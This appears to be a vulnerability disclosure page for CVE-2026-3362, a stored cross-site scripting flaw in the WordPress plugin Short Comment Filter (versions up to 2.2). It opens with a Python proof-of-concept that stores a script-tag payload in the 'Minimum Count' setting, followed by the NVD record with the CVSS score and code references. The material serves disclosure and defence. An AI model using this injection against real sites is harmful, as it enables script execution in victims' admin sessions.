CVE-2026-3362

# Exploit Title: Short Comment Filter <= 2.2 Stored XSS # Description: Injecting XSS payload via the 'Minimum Count' setting. import requests # Target configuration target_url = "http://example.com/wp-admin/admin.php?page=short-comment-filter-settings" admin_cookie = "wordpress_logged_in_admin_cookie_value" # Malicious payload to be stored # The payload closes the value attribute and injects a script tag xss_payload = '"><script>alert("XSS");</script>' # Data payload for the POST request post_data = { "action": "update", "option_page": "short_comment_filter_options", "_wpnonce": "[FETCH_NONCE_FROM_PAGE]", "_wp_http_referer": "/wp-admin/admin.php?page=short-comment-filter-settings", "minimum_count": xss_payload } headers = { "Cookie": f"wordpress_logged_in_...={admin_cookie}" } # Send the request to store the payload response = requests.post(target_url, headers=headers, data=post_data) if response.status_code == 200: print("Payload potentially stored. Visit settings page to trigger XSS.") else: print("Failed to send request.")

{"cve": {"id": "CVE-2026-3362", "sourceIdentifier": "[email protected]", "published": "2026-04-22T09:16:21.757", "lastModified": "2026-04-22T20:22:50.570", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Short Comment Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Minimum Count' settings field in all versions up to and including 2.2. This is due to insufficient input sanitization (no sanitize callback on register_setting) and missing output escaping (no esc_attr() on the echoed value in the input's value attribute). The option value is stored via update_option() and rendered unescaped in an HTML attribute context. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in the settings page that will execute whenever a user accesses that page. This is particularly impactful in WordPress multisite installations or when DISALLOW_UNFILTERED_HTML is set, where administrators are not granted the unfiltered_html capability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/short-comment-filter/tags/2.2/classes/short-comment-filter-settings.php#L21", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/short-comment-filter/tags/2.2/classes/short-comment-filter-settings.php#L54", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/short-comment-filter/tags/2.2/classes/short-comment-filter-settings.php#L61", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/short-comment-filter/tags/2.2/views/settings.php#L25", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/short-comment-filter/trunk/classes/short-comment-filter-settings.php#L21", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/short-comment-filter/trunk/classes/short-comment-filter-settings.php#L54", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/short-comment-filter/trunk/classes/short-comment-filter-settings.php#L61", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/short-comment-filter/trunk/views/settings.php#L25", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4ba46475-bf54-49a8-9b0e-fae3fb4e1df9?source=cve", "source": "[email protected]"}]}}